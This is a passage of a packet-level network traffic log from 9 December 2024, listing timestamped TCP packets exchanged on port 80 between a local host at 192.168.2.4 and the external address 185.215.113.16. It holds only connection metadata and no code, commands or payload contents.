Dec 9, 2024 08:08:41.596615076 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.596635103 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.596672058 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.596878052 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.596992970 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.597109079 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.597779036 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.597892046 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.597910881 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.598076105 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.598663092 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.598726988 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.617872953 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.617959976 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.618006945 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.618208885 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.618248940 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.618367910 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.618467093 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.618510008 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.618601084 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.618643045 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.619353056 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.619404078 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.619513035 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.619548082 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.620210886 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.620338917 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.620338917 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.620378017 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.621222973 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.621237040 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.621273994 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.621299982 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.622030020 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.622078896 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.622123957 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.622308016 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.622876883 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.622921944 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.622981071 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.623022079 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.623769999 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.623877048 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.623884916 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.623981953 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.624646902 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.624701023 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.624751091 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.624799967 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.625567913 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.625685930 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.625741005 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.626435995 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.626534939 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.626588106 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.627341986 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.627614021 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.627638102 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.627717018 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.628201962 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.628310919 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.628315926 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.628365040 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.629097939 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.629148960 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.629208088 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.629281044 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.629970074 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.630093098 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.630150080 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.630868912 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.630968094 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.630980015 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.630995035 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.631767035 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.631819963 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.631861925 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.631925106 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.632637978 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.632745028 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.632812977 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.633529902 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.633588076 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.633631945 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.633745909 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.634460926 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.634543896 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.634567976 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.634815931 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.635335922 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.635377884 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.635430098 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.635500908 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.636255980 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.636373997 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.636449099 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.637085915 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.637188911 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.637212992 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.637972116 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.638053894 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.638088942 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.638475895 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.638880968 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.638909101 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.638931036 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.638942003 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.639760017 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.639908075 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.639930010 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.639961958 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.640638113 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.640753984 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.640800953 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.641529083 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.641598940 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.641629934 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.642244101 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.642390966 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.642534018 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.642611027 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.642678976 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.643299103 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.643338919 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.643393040 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.643640995 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.644176960 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.644263029 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.644412041 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.644520044 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.645085096 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.645200968 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.645256996 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.645972967 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.646073103 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.646143913 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.646836996 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.646889925 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.646955013 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.647078991 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.647718906 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.647799015 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.647845984 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.648061991 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.648624897 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.648737907 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.649187088 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.649509907 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.649554968 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.649626017 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.649705887 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.650418997 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.650535107 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.650643110 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.651329041 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.651376963 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.651479006 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.651520967 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.652306080 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.652345896 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.652378082 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.652590036 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.653079987 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.653130054 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.653172016 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.653223038 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.653950930 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.653995991 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.654064894 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.654290915 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.654911995 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.654956102 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.655019999 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.655055046 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.655796051 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.655837059 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.655848026 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.655961990 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.656610966 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.656673908 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.656730890 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.656771898 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.657495022 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.657614946 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.657617092 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.658166885 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.658416033 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.658462048 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.658493996 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.658596992 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.659276962 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.659317017 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.659368038 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.659526110 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.660156965 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.660207987 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.660267115 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.660314083 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.661078930 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.661115885 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.661180973 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.661278009 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.788655996 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.788683891 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.788738966 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.788738966 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.789041042 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.789083958 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.789136887 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.789527893 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.789972067 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.790051937 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.790064096 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.790235043 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.790807009 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.792085886 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.810344934 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.810354948 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.810632944 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.810694933 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.810709953 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.810744047 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.811477900 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.811606884 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.812099934 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.812418938 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.812577009 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.813261986 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.813357115 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.813385010 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.814152956 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.814274073 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.814357996 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.815036058 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.815206051 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.815256119 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.816009045 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.816087008 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.816129923 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.816203117 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.816838026 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.816904068 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.817004919 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.817713022 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.817786932 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.817809105 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.818589926 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.818697929 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.818747997 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.819518089 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.819626093 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.819672108 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.820358038 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.820472956 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.821259975 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.821342945 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.821384907 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.822191000 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.822283030 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.822308064 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.823036909 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.823235989 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.823328018 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.823916912 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.824029922 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.824090004 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.824790001 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.824924946 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.825045109 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.825690985 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.825802088 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.825884104 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.826591969 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.826700926 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.826848030 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.827465057 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.827573061 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.828092098 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.828356028 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.828484058 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.828548908 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.829265118 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.829336882 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.829380035 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.830137014 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.830264091 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.830288887 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.830307007 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.831033945 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.831124067 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.831154108 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.831924915 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.832087994 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.832112074 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.832824945 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.832961082 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.833024979 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.833689928 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.833802938 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.833862066 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.834562063 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.834676027 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.834784985 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.835472107 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.835545063 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.835549116 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.836076975 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.836344957 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.836476088 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.836534977 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.837255001 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.837377071 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.838135004 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.838227034 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.838252068 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.839025021 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.839025974 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.839133024 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.839205980 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.839975119 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.840042114 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.840084076 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.840131998 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.840807915 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.840856075 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.840908051 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.841681004 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.841875076 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.841928005 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.842596054 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.842648029 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.843449116 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.843496084 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.843559980 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.844079018 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.844326019 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.844449043 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:41.844511032 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:41.845213890 CET	80	49854	185.215.113.16	192.168.2.4
